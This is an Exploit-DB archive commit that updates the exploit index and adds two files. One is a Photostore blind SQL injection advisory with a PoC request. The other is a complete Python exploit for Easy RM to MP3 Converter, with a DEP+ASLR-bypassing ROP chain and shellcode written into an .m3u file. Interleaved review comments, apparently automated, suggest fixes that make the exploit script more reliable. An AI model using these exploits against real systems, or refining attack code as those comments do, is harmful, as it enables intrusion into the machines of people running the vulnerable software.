DB: 2016-07-01

2 new exploits

phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection
TFT Gallery <= 0.10 - Password Disclosure Remote Exploit
phpBookingCalendar 1.0c - (details_view.php) SQL Injection
TFT Gallery 0.10 - Password Disclosure Remote Exploit

Seattle Lab Mail 5.5 - POP3 Buffer Overflow
Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow

Ktools Photostore 4.7.5 - Blind SQL Injection

Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass
Offensive Security 2016-07-01 05:05:35 +00:00
parent f74a7dfb7e
commit 0fddce018e
3 changed files with 242 additions and 3 deletions


@ -1349,8 +1349,8 @@ id,file,description,date,author,platform,type,port
1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0
1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl - COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0
1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0
1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c - (details_view.php) Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - (details_view.php) SQL Injection",2006-03-25,undefined1_,php,webapps,0
1611,platforms/php/webapps/1611.pl,"TFT Gallery <= 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0 1611,platforms/php/webapps/1611.pl,"TFT Gallery 0.10 - Password Disclosure Remote Exploit",2006-03-25,undefined1_,php,webapps,0
1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0
1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 - Multiple Vulnerabilities/Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0
@ -14196,7 +14196,7 @@ id,file,description,date,author,platform,type,port
16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection",2011-02-08,metasploit,windows,remote,0
16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0 16397,platforms/windows/remote/16397.rb,"Lyris ListManager MSDE Weak sa Password",2010-09-20,metasploit,windows,remote,0
16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server Hello Overflow",2010-04-30,metasploit,windows,remote,0
16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve Message Engine Heap Overflow",2010-04-30,metasploit,windows,remote,0
16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16402,platforms/windows/remote/16402.rb,"CA BrightStor HSM Buffer Overflow",2010-05-09,metasploit,windows,remote,0
@ -35864,6 +35864,7 @@ id,file,description,date,author,platform,type,port
39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0 39654,platforms/windows/dos/39654.pl,"Xion Audio Player <= 1.5 (build 160) - .mp3 Crash PoC",2016-04-04,"Charley Celice",windows,dos,0
40046,platforms/php/webapps/40046.txt,"Ktools Photostore 4.7.5 - Blind SQL Injection",2016-06-30,"Gal Goldshtein and Viktor Minin",php,webapps,80
39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0 39656,platforms/multiple/local/39656.py,"Hexchat IRC Client 2.11.0 - Directory Traversal",2016-04-04,PizzaHatHacker,multiple,local,0
39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0 39659,platforms/hardware/webapps/39659.txt,"PQI Air Pen Express 6W51-0000R2 / 6W51-0000R2XXX - Multiple Vulnerabilities",2016-04-04,Orwelllabs,hardware,webapps,0
@ -36121,6 +36122,7 @@ id,file,description,date,author,platform,type,port
39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 39930,platforms/osx/dos/39930.c,"OS X Kernel - Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0
39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Stored XSS",2016-06-13,"Hamit Abis",php,webapps,80
39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - CSRF Shell Upload",2016-06-13,"Ali Ghanbari",php,webapps,80
39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass",2016-06-13,"Fitzl Csaba",windows,local,0
39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39934,platforms/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80 39935,platforms/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",php,webapps,80
39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80 39936,platforms/php/webapps/39936.txt,"Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",php,webapps,80
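Review bot: The new row `40046,platforms/php/webapps/40046.txt,...` is inserted between ids 39654 and 39656, while every other id in the visible hunks (and the 39933 row added just above 39934) is in ascending order; this breaks the monotonic ordering of the id column. If any consumer of files.csv relies on sorted ids (binary search, dedup by adjacency), it will miss or misplace this entry — a new id of 40046 belongs after the last 400xx row at the end of the file. Moving the row is the only change needed; the row content itself is consistent with its neighbours (port 80 for a webapps entry, matching the 3993x rows).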


platforms/php/webapps/40046.txt Executable file

@ -0,0 +1,45 @@
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind sql injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.
Vulnerable code is located in the mgr.login.php file:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
mysqli_query( $db, '' . 'SELECT username,password,email,admin_id FROM ' . $dbinfo[pre] . 'admins where email = \'' . $_POST['email'] . '\'' );
$result = ;
mysqli_num_rows( $result );
$returned_rows = ;
mysqli_fetch_array( $result );
$db_admin_user = ;
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
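Review bot: The affected-version range contradicts itself: the title says `Ktools Photostore <= 4.7.5` (4.7.5 vulnerable) while the `Affected :` field says `Versions prior to 4.7.5` (4.7.5 fixed); one of the two should be corrected so readers can tell whether 4.7.5 is the fixed release. The quoted `recover_login` excerpt has dangling assignments (`$result = ;`, `$returned_rows = ;`, `$db_admin_user = ;`), which looks like decompiler/deobfuscator output rather than the shipped source — a one-line comment such as `# listing recovered from encoded PHP; the empty right-hand sides are the preceding call's return value` would stop readers treating it as verbatim code. In the PoC, `Content-Length: 9` does not match the body `email=%27%20[SQL PAYLOAD];#`, and the `Cookie:` and `Referer:` headers are unnecessary for a pre-authentication request, so they should be dropped or marked as optional. A remediation line is also missing; the concrete fix for the visible sink is to bind `$_POST['email']` with `mysqli_prepare` / `bind_param` instead of concatenating it into the SELECT.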

platforms/windows/local/39933.py Executable file

@ -0,0 +1,192 @@
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
# added missing parts, and some optimisation by Csaba Fitzl
rop_gadgets = [
#mov 1000 to EDX - Csaba
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10025a1c, # XOR EDX,EDX # RETN
0x1002bc3d, # MOV EAX,411 # RETN
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc4c, # ADD EAX,100 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc24, # ADD EAX,80 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1002dc41, # ADD EAX,40 # POP EBP # RETN
0x41414141, # Filler (compensate)
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
# AT this point EAX = 0x1000
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x1001bf0d, #(RVA : 0x0001bf0d) : # ADC EDX,ESI
0x41414141, # Filler (compensate)
0x10026d56, # POP EAX # RETN [MSRMfilter03.dll]
0x10032078, # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
0x1002e0c8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [MSRMfilter03.dll]
0x1001a788, # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10027c5a, # POP EBP # RETN [MSRMfilter03.dll]
0x1001b058, # & push esp # ret [MSRMfilter03.dll]
0x1002b93e, # POP EAX # RETN [MSRMfilter03.dll]
0xfffffffb, # put delta into eax (-> put 0x00000001 into ebx)
0x1001d2ac, # ADD EAX,4 # RETN
0x10023327, # INC EAX # RETN
0x10023327, # INC EAX # RETN
0x1001bdee, # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN [MSRMfilter03.dll]
0x41414141, # Filler (compensate)
0x41414141, # Filler (compensate)
0x10029f74, # POP ECX # RETN [MSRMfilter03.dll]
0xffffffff, #
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002dd3e, # INC ECX # AND EAX,8 # RETN [MSRMfilter03.dll]
0x1002bc6a, # POP EDI # RETN [MSRMfilter03.dll]
0x1001c121, # RETN (ROP NOP) [MSRMfilter03.dll]
0x10026f2b, # POP EAX # RETN [MSRMfilter03.dll]
0x10024004, #address to xor, it will point to the DLL's data section which is writeable. Also will work as NOP
0x1002bc07 # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
buffersize = 26090
junk = "A" * buffersize
eip = '\x85\x22\x01\x10' # {pivot 8 / 0x08} : # ADD ESP,8 # RETN
rop = create_rop_chain()
calc = (
"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")
shell = "\x90"*0x10 + calc
exploit = junk + eip + rop + shell + 'C' * (1000-len(rop)-len(shell))
filename = "list.m3u"
textfile = open(filename , 'w')
textfile.write(exploit)
textfile.close()
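Review bot: The payload is written in text mode (`textfile = open(filename , 'w')`), so on Windows any 0x0A byte in the ROP chain or shellcode would be rewritten as CR LF and shift every later gadget address; the current addresses happen to avoid 0x0A, but that is fragile for anyone re-rolling the chain. Open the file in binary mode and let the context manager close it: `with open(filename, 'wb') as textfile:` / `    textfile.write(exploit)`. Note the script is Python 2 only — `''.join(struct.pack('<I', _) ...)` joins `bytes` into a `str` and `"A" * buffersize` is a text string, both of which fail or mis-encode under Python 3 — so a `# Python 2 only` line next to `# Tested on:` would save readers a confusing TypeError. The `# AT this point EAX = 0x1000` claim checks out against the visible gadget counts (0x411 + 11*0x100 + 0x80 + 0x40 + 11*4 + 3).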